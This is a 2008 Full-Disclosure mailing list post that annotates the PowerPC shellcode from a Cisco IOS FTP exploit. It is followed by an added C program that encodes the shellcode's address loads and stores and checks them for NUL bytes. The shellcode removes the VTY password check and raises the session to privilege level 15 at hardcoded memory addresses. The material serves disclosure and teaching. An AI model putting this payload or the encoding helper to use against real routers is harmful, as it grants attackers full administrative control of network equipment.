Date: Wed, 30 Jul 2008 10:03:51 +0100
From: "Andy Davis" <iosftpexploit@...glemail.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Cisco IOS shellcode explanation

Hi,

Lots of people have been asking for details about the slightly unorthodox
shellcode I used within the IOS FTP exploit, so here goes:

.equ vty_info, 0x8182da60   //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis 4,vty_info@ha
la 4,vty_info@l(4)
xor 8,8,8                   //Clear r8
lwzx 7,4,8                  //Get pointer to VTY info structure
stw 8,372(7)                //Write zero to first offset to remove
                            //the requirement to enter a password
subi 8,8,1                  //Set r8 to be 0xffffffff
addi 7,7,233                //Add second offset in two steps to
                            //avoid nulls in the shellcode
stw 8,1226(7)               //Write 0xffffffff to second offset to
                            //priv escalate to level 15
                            //(technically this should be 0xff100000
                            //but 0xffffffff works and is more efficient)
mr 3,8                      //Use 0xffffffff as a parameter
                            //to pass to terminate()
lis 4,terminate@ha
la 4,terminate@l(4)
mtctr 4
bctr                        //terminate "this process"
                            //(current connection to the FTP server)

Cheers,

Andy

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
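The post leans on two PowerPC idioms that are easy to get wrong when hand-rolling shellcode: materialising a 32-bit address with a lis/la pair (the @ha/@l split, where @ha must compensate for addi sign-extending its 16-bit immediate), and keeping every 4-byte instruction word free of NUL bytes so the payload survives a string copy. The following C program is an added example written for this archive page, not code from Andy Davis's post or from the IOS FTP exploit. It encodes the lis/la pairs for the two constants the post defines (vty_info = 0x8182da60 and terminate = 0x80e4086c) and the two stw stores, simulates what the lis/la pair leaves in the register, and scans the words for NUL bytes. The instruction encodings follow the PowerPC D-form layout (primary opcode 15 for addis/lis, 14 for addi/la, 36 for stw); the function names are this example's own.

```c
/*
 * Added example (not from the original post): encode the PowerPC
 * lis/la (@ha/@l) address loads and stw stores used in the IOS
 * shellcode, check the words for NUL bytes, and verify that the
 * two-instruction load really reproduces the intended 32-bit value.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constants taken from the post's .equ directives. */
#define VTY_INFO   0x8182da60u
#define TERMINATE  0x80e4086cu

/* @ha / @l as GNU as computes them. addi sign-extends its 16-bit
 * immediate, so when bit 15 of the low half is set @ha must be one
 * higher than the plain high half, otherwise the load comes out
 * 0x10000 too low. */
static uint16_t ppc_ha(uint32_t v) { return (uint16_t)((v + 0x8000u) >> 16); }
static uint16_t ppc_lo(uint32_t v) { return (uint16_t)(v & 0xFFFFu); }

/* D-form: opcode(6) | rT/rS(5) | rA(5) | 16-bit immediate */
static uint32_t dform(uint32_t opcd, uint32_t rt, uint32_t ra, uint16_t imm)
{
    return (opcd << 26) | ((rt & 31u) << 21) | ((ra & 31u) << 16) | imm;
}

/* lis rD,imm   == addis rD,0,imm   (primary opcode 15) */
static uint32_t enc_lis(uint32_t rd, uint16_t imm) { return dform(15, rd, 0, imm); }
/* la rD,d(rA)  == addi rD,rA,d     (primary opcode 14) */
static uint32_t enc_addi(uint32_t rd, uint32_t ra, uint16_t d) { return dform(14, rd, ra, d); }
/* stw rS,d(rA)                     (primary opcode 36) */
static uint32_t enc_stw(uint32_t rs, uint32_t ra, uint16_t d) { return dform(36, rs, ra, d); }

/* Value left in rD after "lis rD,v@ha ; la rD,v@l(rD)" executes. */
static uint32_t simulate_lis_la(uint32_t v)
{
    uint32_t r = (uint32_t)ppc_ha(v) << 16;          /* lis */
    r += (uint32_t)(int32_t)(int16_t)ppc_lo(v);      /* addi, sign-extended */
    return r;
}

/* The naive split (plain high half, no +0x8000) for comparison. */
static uint32_t simulate_naive_split(uint32_t v)
{
    uint32_t r = (v & 0xFFFF0000u);
    r += (uint32_t)(int32_t)(int16_t)ppc_lo(v);
    return r;
}

static int has_nul_byte(uint32_t insn)
{
    for (int i = 0; i < 4; i++)
        if (((insn >> (8 * i)) & 0xFFu) == 0) return 1;
    return 0;
}

/* Number of NUL bytes across a sequence of instruction words. */
static int count_nul_bytes(const uint32_t *code, size_t n)
{
    int nuls = 0;
    for (size_t i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            if (((code[i] >> (8 * b)) & 0xFFu) == 0) nuls++;
    return nuls;
}

/* Emit the lis/la pair for a 32-bit constant into out[0..1]. */
static void assemble_load32(uint32_t rd, uint32_t v, uint32_t out[2])
{
    out[0] = enc_lis(rd, ppc_ha(v));
    out[1] = enc_addi(rd, rd, ppc_lo(v));
}

int main(void)
{
    uint32_t code[6];
    assemble_load32(4, VTY_INFO, &code[0]);   /* lis 4,vty_info@ha ; la 4,vty_info@l(4) */
    code[2] = enc_stw(8, 7, 372);             /* stw 8,372(7)  */
    code[3] = enc_stw(8, 7, 1226);            /* stw 8,1226(7) */
    assemble_load32(4, TERMINATE, &code[4]);  /* lis 4,terminate@ha ; la 4,terminate@l(4) */

    for (size_t i = 0; i < 6; i++)
        printf("%08x%s\n", code[i], has_nul_byte(code[i]) ? "  <-- contains NUL" : "");

    printf("vty_info  via lis/la: %08x (naive split would give %08x)\n",
           simulate_lis_la(VTY_INFO), simulate_naive_split(VTY_INFO));
    printf("terminate via lis/la: %08x\n", simulate_lis_la(TERMINATE));
    printf("NUL bytes in these six words: %d\n", count_nul_bytes(code, 6));
    return 0;
}
```

Note that vty_info exercises the sign-extension corner: its low half 0xda60 has bit 15 set, so @ha evaluates to 0x8183 rather than 0x8182 and the naive split would land 0x10000 too low. The NUL scan here covers only the six words the example assembles; auditing a full payload means running the same check over every instruction word in it.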